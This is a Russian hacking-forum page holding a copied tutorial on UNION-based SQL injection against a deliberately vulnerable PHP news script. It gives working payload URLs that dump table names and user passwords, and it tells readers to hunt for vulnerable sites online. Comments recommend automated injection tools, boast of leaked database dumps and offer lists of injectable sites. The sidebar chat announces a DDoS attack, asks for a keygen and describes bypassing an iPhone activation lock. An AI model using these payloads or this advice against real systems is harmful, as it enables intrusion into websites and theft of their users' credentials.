Интересное в сети
Форум happy-hack.ru
Мы Вконтакте
Посетители

Сейчас на сайте: 17
Пользователей: 0
Гостей: 16

Пользователи онлайн: 


- отсутствуют

Гости (20 последних): 



Роботы: 

Статистика




Чат

Чтобы оставлять сообщения - зарегистрируйтесь
  • XaXaTyH
    14 апр 2024, 05:07
    • admin
      12 апр 2024, 14:26
      *Ravin234,
      • Ravin234
        7 апр 2024, 19:44
        в 20:00 будет начнем DDoS атаку на сайт , по дополнительной информации писать на почту dzheyms.respektovich*gmail.com или телеграм *Ops0321
        • Macin
          14 мар 2024, 19:48
          Подписывайтесь на наш канал, здесь t.me мы собрали лучший софт. На нашем канале содержится только лучшие программы для компьютера и все, кто подпишутся, получат доступ к ним.
          • RUSLAN19860808
            7 мар 2024, 02:56
            Подскажите как лучше создать аккаунты в телеграмме штук 10 надо для тапалки
            • hecker
              6 мар 2024, 21:41
              походу ответа нет
              • hecker
                5 мар 2024, 23:24
                крипторы
                • hecker
                  5 мар 2024, 23:23
                  администраторы сайта happyhack.net добавте в меню
                  • hecker
                    5 мар 2024, 23:22
                    не понял macin ты что несешь
                    • Macin
                      5 мар 2024, 13:04
                      Приглашаем вас на наш Телеграмм канал с софт программами! Подписывайтесь сейчас, чтобы быть в курсе последних обновлений и новинок в мире программного обеспечения! ?????????
                      t.me
                      • Steven0
                        2 фев 2024, 22:50
                        Does anyone have it?
                        • Steven0
                          2 фев 2024, 22:50
                          I need Orgdata Logikal app with keygen.
                          • Steven0
                            2 фев 2024, 22:50
                            Hello.
                            • Mason
                              26 янв 2024, 08:35
                              Вайс салам, хотел забрать кое что) пзц все линки битые
                              • tayfun221
                                30 дек 2023, 00:35
                                Не буду шить знакомого тел ,сказал там фото с армейки ,Вдруг вспомнит свой айди
                                • tayfun221
                                  30 дек 2023, 00:34
                                  Завтра заберу под эксперименты 6 ,за 500 рублей битый изрядно и одно яблоко горит
                                  • tayfun221
                                    30 дек 2023, 00:33
                                    Взял у знакомого 5 s ,хотел попробовать фото вытащить , короче вытащить из sки точно что-то не возможно ,как из без префикса s
                                    • tayfun221
                                      30 дек 2023, 00:30
                                      Читать комментарии к последнему видео в Ютуб ,о плюсах и минусах чекрай
                                      • tayfun221
                                        30 дек 2023, 00:19
                                        • tayfun221
                                          30 дек 2023, 00:18
                                          • tayfun221
                                            30 дек 2023, 00:15
                                            Стоимость может быть не точной )
                                            • tayfun221
                                              30 дек 2023, 00:15
                                              Но вероятность есть ..если из 3 х купленных АиФ по 500 р попадется 1
                                              • tayfun221
                                                30 дек 2023, 00:14
                                                Подозреваю не со всеми устройствами так прокатит
                                                • tayfun221
                                                  30 дек 2023, 00:11
                                                  Кстати есть какие то программы для звонков по вай фай для АиФ с привязкой номера
                                                  • tayfun221
                                                    30 дек 2023, 00:06
                                                    Практически не просит паролей.
                                                    • tayfun221
                                                      30 дек 2023, 00:05
                                                      Так же работает почта ) даже пабг игрушку удалось скачать
                                                      • tayfun221
                                                        30 дек 2023, 00:04
                                                        В целом мне попалсЯ Айф 6 с блок активации ,мне удалось зачекрить и отпаролится правельным софтом ,также активировать Appstore путем Рут , теперь установив ватсап ,теоритически имея левую живую сим можно привязать АиФ к номеру ,и у всяких банков с фри вай фай звонить похоже хоть в африку
                                                        • tayfun221
                                                          30 дек 2023, 00:01
                                                          Всем привет есть небольшой гайд,!
                                                          • Mr.TROLOLO
                                                            22 дек 2023, 13:09
                                                            Есть кто живчик еще !? Сколько лет этому сайту, сколько хозяев поменялось. Кто щас админ то !,
                                                            • tayfun221
                                                              6 дек 2023, 16:53
                                                              Опрос на сайте
                                                              Как Вы нашли нас?

                                                              SQL-INJECTION

                                                              Автор: Abrazor | Дата: 5-07-2012, 19:15 | Комментариев: 0 | Просмотров: 12 328
                                                              Уязвимость SQL-injection
                                                              Введение
                                                              В данной работе на примере исследуется уязвимость типа SQL Injection с использованием СУБД MySQL и PHP скриптов. Соответственно, для понимания происходящего требуются знания языка запросов SQL и языка php. После теоретической части будут приведены примеры кода и будет описано как все это можно проверить у себя на локальной машине с использованием комплекса DENWER под ОС Windows, хотя можно проделать тоже саоме и под другую ОС, например Linux, используя ту же базу данных MySQL. Т.е. для данного эксперимента потребуется:
                                                              Веб-сервер Apache
                                                              PHP, прикрученный к apache
                                                              СУБД MySQL
                                                              Атака типа SQL Injection — один из распространённых способов взлома сайтов и программ, работающих с базами данных, основанный на внедрении в запрос произвольного SQL-кода. Это атака, при которой производится вставка вредоносного кода в строки, передающиеся затем в базу MySQL, для синтаксического анализа и выполнения. Эта уязвимость может дать возможность атакующему выполнить произвольный запрос к базе данных (например, прочитать содержимое любых таблиц, удалить, изменить или добавить данные), получить возможность чтения и/или записи локальных файлов и выполнения произвольных команд на атакуемом сервере.
                                                              Основная форма атаки SQL Injection состоит в прямой вставке кода в пользовательские входные переменные, которые объединяются с командами SQL и выполняются. Менее явная атака внедряет небезопасный код в строки, предназначенные для хранения в таблице или в виде метаданных. Когда впоследствии сохраненные строки объединяются с динамической командой SQL, происходит выполнение небезопасного кода.
                                                              Атака осуществляется посредством преждевременного завершения текстовой строки и присоединения к ней новой команды. Поскольку к вставленной команде перед выполнением могут быть добавлены дополнительные строки, злоумышленник заканчивает внедряемую строку меткой комментария «--». Весь последующий текст во время выполнения не учитывается.
                                                              Пример использования
                                                              В качестве примера, приведу маленький php скриптик. В нем новости выводятся из базы данных и отображаются пользователям. Но есть одна интересная вещь. Достаточно давно в PHP появилась такая штука, как магические кавычки — эффект автоматической замены кавычки на обратный слэш и кавычку при операциях ввода/вывода в PHP. Это сделано как раз для избежания sql injection у начинающих программистов. По умолчанию в конфиге php.ini данная функция включена. Нам же, для упрощения проведения испытаний надо ее выключить:
                                                              magic_quotes_gpc = Off в файле php.ini
                                                              Далее приведен пример скрипта index.php, для которого и возможно провести исследование уязвимости.
                                                              <?php
                                                              //Настройки БД
                                                              $script['mysql_server']='localhost';//Хост
                                                              $script['mysql_login']='root';//Логин
                                                              $script['mysql_password']='';//Пароль
                                                              $script['mysql_db']='test';//Имя БД

                                                              //Сам скрипт
                                                              $body="";
                                                              $body.="<html>
                                                              <head><title>Новости</title></head>
                                                              <body>
                                                              ";

                                                              mysql_connect($script['mysql_server'], $script['mysql_login'], $script['mysql_password']) or die('Не могу подключиться к серверу');
                                                              mysql_select_db($script['mysql_db']) or die('Не могу подключиться к БД');

                                                              if(!empty($_GET['id']))//Вывод одной новости
                                                              {
                                                                  $body.="<h3>Просмотр новости</h3> \n<br>";
                                                                  $id=$_GET['id'];
                                                                  //$zapros="SELECT * FROM news WHERE id='".$_GET['id']."';";
                                                                  //echo($id);
                                                                      //echo("<br>");   //  если это все раскомментировать то можно будет смотреть каким будет
                                                                      //echo($zapros);  //  запрос к базе, при изменения id в поле адреса браузера
                                                                      //echo("<br>");
                                                                  $zapros="SELECT * FROM news WHERE id='".$_GET['id']."';";//Уязвимый запрос
                                                                  $result=mysql_query($zapros);
                                                                  echo(Mysql_error());//Вывод ошибки
                                                                  $data=mysql_fetch_row($result);
                                                                  //Вывод результата запроса
                                                                  $body.="Заголовок: <b>".$data['3']."</b>\n";
                                                                  $body.="<hr><pre>".$data['4']."</pre>\n";
                                                                  $body.="<hr>Добавленно ".$data['5']." ".$data['1']." в ".$data['2']."\n<br><br>";
                                                                  $body.="<a href='?'>Назад</a>";
                                                              }
                                                              else //Ну и простое отображение всех новостей(шоб понятней было где скуль)
                                                              {

                                                                  $body.="<h3>Все новости</h3> \n<br>";
                                                                  $zapros="SELECT * FROM news;";
                                                                  $result_z=mysql_query($zapros);
                                                                  $count_str=mysql_num_rows($result_z);
                                                                  for($i=1;$i<=$count_str;$i++)
                                                                  {
                                                                      $result=@mysql_fetch_assoc($result_z);
                                                                      $body.=$i.".<a href='?id=".$i."'>".$result['caption']."<a/><br>\n";
                                                                  }
                                                              }
                                                              $body.="</body></html>";
                                                              echo($body);
                                                              ?>

                                                              Далее приводится дамп базы данных test, из которой выбираются данные в этом скрипте. Тут есть 2 таблицы: users и news, из которых и выбираются данные в запросах.
                                                              CREATE TABLE `news` (
                                                                `id` int(11) NOT NULL DEFAULT '0',
                                                                `date` varchar(8) NOT NULL DEFAULT '',
                                                                `time` varchar(7) NOT NULL DEFAULT '',
                                                                `caption` varchar(50) NOT NULL DEFAULT '',
                                                                `text` text NOT NULL,
                                                                `avtor` varchar(50) NOT NULL DEFAULT ''
                                                              ) ENGINE=MyISAM DEFAULT CHARSET=cp1251;

                                                              INSERT INTO `news` VALUES (1, '01/04/09', '12:30', 'Превед :)', 'Хакнем скриптег! :)\r\nИ побыстрее а то малоли... :P', 'Бубл');
                                                              INSERT INTO `news` VALUES (2, '25/03/09', '11:10', 'БУгага', '=))) :))\r\nТолько за дизайн извиняюсь... както кривовато смотриться...', 'Бубл');

                                                              CREATE TABLE `users` (
                                                                `login` varchar(20) NOT NULL DEFAULT '',
                                                                `password` varchar(20) NOT NULL DEFAULT ''
                                                              ) ENGINE=MyISAM DEFAULT CHARSET=cp1251;

                                                              INSERT INTO `users` VALUES ('Admin', 'PaSsWoRd');
                                                              INSERT INTO `users` VALUES ('User', '123456');
                                                              INSERT INTO `users` VALUES ('Looser', 'big_password');

                                                              Методы проведения
                                                              Как определить данный баг
                                                              Это довольно таки просто. Надо вставлять во все поля, переменные, куки двойную и одинарные кавычки. Начнем с вот такого скрипта
                                                              http://test1.ru/index.php?id=1

                                                              Соответетвенно оригинальный запрос выглядит так:
                                                              SELECT * FROM news WHERE id='1';

                                                              Для наглядности расскоментируем в скрипте index.php строки, тогда вверх втраницы будет отображаться здачение id, передаваемое из адресной строки браузера и сам запрос к базе данных.
                                                              //$zapros="SELECT * FROM news WHERE id='".$_GET['id']."';";
                                                                  //echo($id);
                                                                      //echo("<br>");   //  если это все раскомментировать то можно будет смотреть каким будет
                                                                      //echo($zapros);  //  запрос к базе, при изменения id в поле адреса браузера
                                                                      //echo("<br>");

                                                              Теперь мы допишем кавычку в переменную "id", вот так
                                                              http://test1.ru/index.php?id=1'

                                                              если переменная не фильтруется и включены сообщения об ошибках то вылезет что то наподобие:
                                                              mysql_query(): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1''

                                                              Так как в запросе к БД будет присутствовать лишняя кавычка:
                                                              SELECT * FROM news WHERE id='1'';

                                                              Если отчет об ошибках выключен то в данном случае можно определить наличие уязвимости вот так:
                                                              http://test1.ru/index.php?id=1'; -- '

                                                              То есть запрос к БД станет вот таким:
                                                              SELECT * FROM news WHERE id='1'; -- '';

                                                              “--“ это знак начала комментария все после него будет отброшено, после него должен быть обязательно пробел и перед ним тоже). Таким образом для MYSQL запрос остается прежним и отобразиться тоже самое что и для
                                                              http://test1.ru/index.php?id=1

                                                              Как можно из этого извлечь что-то полезное
                                                              Для начала самое полезное это команда UNION. Модифицируем обращение к скрипту
                                                              http://test1.ru/index.php?id=1' UNION SELECT 1 -- '

                                                              Запрос к БД у нас получается вот таким:
                                                              SELECT * FROM news WHERE id='1' UNION SELECT 1 -- '';

                                                              Но есть одно ограничение -- количество столбцов до и после UNION должно быть одинаковым, соответственно его придется подбирать.
                                                              В нашем примере, как видно из дампа базы -- полей 6, соответственно нам подойдет
                                                              http://test1.ru/index.php?id=1' UNION SELECT 1,2,3,4,5,6 -- '

                                                              Результатом вывода такой команды будет то же что и должно выводиться без команды UNION. Но нам интересно увидеть какие-нибудь другие данные из базы, тогда заменим id=1 на id=-1 и продолжим. Причем заменять необязательно на -1, просто нужно выбрать такое значение которое не выбирается из БД, в нашем случае полей 6, так что может подойти любой значение больше 6 или меньше 1.
                                                              Рыщем по таблицам
                                                              Если есть доступ к INFORMATION_SCHEMA и если версия MYSQL >=5, то можно сделать так:
                                                              http://test1.ru/index.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 42,1 -- '';

                                                              Где 42,1 -- 42 - будет названием таблицы, причем нумерация идет с первой БД. Т.е. если есть несколько баз, то будут показываться таблицы из всех имеющихся баз данных -- нумерация сквозная. Естественно эти названия будут показываться в каком-то из полей вывода странички. Точнее они будут показываться в том поле, в которое мы поставили TABLE_NAME, то есть у нас название таблицы будет отображаться в поле номер 4, то есть вместо заголовка новости.
                                                              http://test1.ru/index.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 41,1 -- '';

                                                              Начиная с номера LIMIT 41,1 начинается искомая нами база данных test. Соответственно будут показываться названия таблиц базы данных в поле 4.
                                                              SQL-INJECTION

                                                              Если использовать такой запрос:
                                                              http://test1.ru/index.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 42,1 -- '';

                                                              То получим:
                                                              SQL-INJECTION

                                                              Так мы находим название таблицы. Далее находим названия полей и т.д. В результате можно получить какие-нибудь логины и пароли. На последнем этапе, зная названия таблиц и их полей можно сделать такой запрос. Мы попробуем просмотреть пользователей из таблицы users. Также можно было перебирать чтобы узнать названия полей таблицы, но мы сразу принали что это поля называются login и password.
                                                              http://test1.ru/index.php?id=-1' UNION SELECT 1,2,login,password,5,6 FROM users LIMIT 1,1 -- '


                                                              В результате видим:
                                                              SQL-INJECTION

                                                              http://test1.ru/index.php?id=-1' UNION SELECT 1,2,login,password,5,6 FROM users LIMIT 2,1 -- '

                                                              В результате:
                                                              SQL-INJECTION

                                                              В результате выведутся login и password первого и второго пользователя. Они будут выводиться на тех местах, где должна изначально была выводиться информация из полей 3 и 4.
                                                              И самое интересное, если написать
                                                              http://test1.ru/index.php?id=-1' UNION SELECT 1,2,login,password,5,6 FROM users LIMIT 0,1 -- '

                                                              Так мы увидим:
                                                              SQL-INJECTION

                                                              В результате мы можем узнать данные, которые не отображаются на сайте. В данном примере мы посмотрели админский пароль и может продолжать веселье =).
                                                              Ну а проверить свои силы можно поставив у себя на ПК Денвер ну или же искать в инете сайты с уязвимостями er

                                                              Пароль на все архивы: hh

                                                              Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
                                                              Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.
                                                              • Написал: herionv
                                                              • Дата: 5 июля 2012 19:52
                                                              • Новостей: 1
                                                              • Комментариев: 54
                                                              можно взять парсер, NetDevilz SQL scanner и Havij и не заморачивать себе голову
                                                              • Написал: Abrazor
                                                              • Дата: 5 июля 2012 20:18
                                                              • Новостей: 32
                                                              • Комментариев: 162
                                                              Одно дело когда ты знаешь команды и как проводить атаку,а одно дело когда ты тыкнул на кнопку и оно 80%работы сделало тебе....ну вообщем палка двух концов...кому интересно тот почитает er

                                                              --------------------
                                                              • Написал: VADIMG
                                                              • Дата: 5 июля 2012 20:21
                                                              • Новостей: 1
                                                              • Комментариев: 19
                                                              +1, тема бестолковая, уже никто не раскручивает руками.
                                                              • Написал: Abrazor
                                                              • Дата: 5 июля 2012 20:23
                                                              • Новостей: 32
                                                              • Комментариев: 162
                                                              я еще раз говорю кому интересно как оно все происходит тот почитает ce

                                                              --------------------
                                                              • Написал: Max7771
                                                              • Дата: 5 июля 2012 20:32
                                                              • Новостей: 0
                                                              • Комментариев: 15
                                                              Abrazor,
                                                              Прочитал))И это уже знал))Но всё равно уязвимые сайты найти не смогу, или руки кривые или не везёт, с Havij такая же проблема ни разу ещё нормально взлом не прошёл.
                                                              P.S троли уепитесь АПстену =) dm
                                                              • Написал: Abrazor
                                                              • Дата: 5 июля 2012 20:35
                                                              • Новостей: 32
                                                              • Комментариев: 162
                                                              Brutforce,
                                                              "некому" "тока" cap
                                                              ну и не удивительно что не интересно cv
                                                              а и забыл добавить,если тебе тема не интересна то не стоит писать в ней свои коменты которые больше похожи на кровавый высер педошкольника ei

                                                              --------------------
                                                              • Написал: Abrazor
                                                              • Дата: 5 июля 2012 20:40
                                                              • Новостей: 32
                                                              • Комментариев: 162
                                                              Max7771,
                                                              ну если хочешь скину в личку пару сайтов на которых на ура проводится скул инжектион? cd

                                                              --------------------
                                                              • Написал: herionv
                                                              • Дата: 6 июля 2012 00:38
                                                              • Новостей: 1
                                                              • Комментариев: 54
                                                              я хоть и пользуюсь готовыми программами, но всё равно прочитал.
                                                              • Написал: admin
                                                              • Дата: 6 июля 2012 02:05
                                                              • Новостей: 440
                                                              • Комментариев: 1 403
                                                              Статья заебца,если не копипаст.. notbad
                                                              • Написал: admin
                                                              • Дата: 6 июля 2012 02:18
                                                              • Новостей: 440
                                                              • Комментариев: 1 403
                                                              Цитата: Max7771
                                                              Но всё равно уязвимые сайты найти не смогу, или руки кривые или не везёт

                                                              Братюнь,вот норм софтина,не один десяток дампов слито с её помощью если самому лень искать,просто выбираешь ключевик и парсишь поискоивк на уязвимости..
                                                              • Написал: Abrazor
                                                              • Дата: 6 июля 2012 16:44
                                                              • Новостей: 32
                                                              • Комментариев: 162
                                                              admin,
                                                              статейка копипаст okok
                                                              просто я по ней начал обучатся скул инжекту daaaaa

                                                              --------------------
                                                              • Написал: Max7771
                                                              • Дата: 7 июля 2012 09:41
                                                              • Новостей: 0
                                                              • Комментариев: 15
                                                              admin,
                                                              Спасибо попробуем)))
                                                              • Написал: kirkajkee
                                                              • Дата: 18 июля 2012 15:19
                                                              • Новостей: 0
                                                              • Комментариев: 11
                                                              admin, писани мне в асю 710554 я нашел пару десятков гудов, буду благодарен если научишь скл инъекции и поделюсь приват инфой))
                                                              ну или еще кто нибудь если хорошо шарит
                                                              так для общего развития хочется)
                                                              • Написал: sandra777
                                                              • Дата: 3 августа 2012 19:03
                                                              • Новостей: 15
                                                              • Комментариев: 117
                                                              Статья может быть и интересная, но сил до конца прочитать не хватает.
                                                              • Написал: googlebot
                                                              • Дата: 4 августа 2012 17:16
                                                              • Новостей: 0
                                                              • Комментариев: 8
                                                              спасибо
                                                              • Написал: Denemut
                                                              • Дата: 3 января 2013 03:28
                                                              • Новостей: 0
                                                              • Комментариев: 50
                                                              Пока в закладки, как время будет прочитаю чего там интересного есть :)
                                                              • Написал: SlendeR
                                                              • Дата: 20 декабря 2013 22:20
                                                              • Новостей: 0
                                                              • Комментариев: 26
                                                              Цитата: admin
                                                              Цитата: Max7771
                                                              Но всё равно уязвимые сайты найти не смогу, или руки кривые или не везёт

                                                              Братюнь,вот норм софтина,не один десяток дампов слито с её помощью если самому лень искать,просто выбираешь ключевик и парсишь поискоивк на уязвимости..

                                                              Чувак чувак чувак!!! Ты просто бог! Черт, я видос глядел, где эту софтину используют, а найти не мог! И тут искал, и везде как шнырь лазил... А попал сюда, почитал коммент, перешел по ссылке, и нашел! Черт, спасибо тебе что хуеву-тучу дней назад, ты написал этот коммент!!
                                                              Добавление комментария
                                                              Имя:*
                                                              E-Mail:
                                                              • bowtiesmilelaughingblushsmileyrelaxedsmirk
                                                                heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
                                                                winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
                                                                worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
                                                                expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
                                                                disappointedconfoundedfearfulcold_sweatperseverecrysob
                                                                joyastonishedscreamtired_faceangryragetriumph
                                                                sleepyyummasksunglassesdizzy_faceimpsmiling_imp
                                                                neutral_faceno_mouthinnocent
                                                              Вопрос: И выйдет девушка к тебе, Водой окатит из колодца, Чтобы в суровом октябре Ты мог ********
                                                              Ответ:*
                                                              Введите два слова, показанных на изображении: *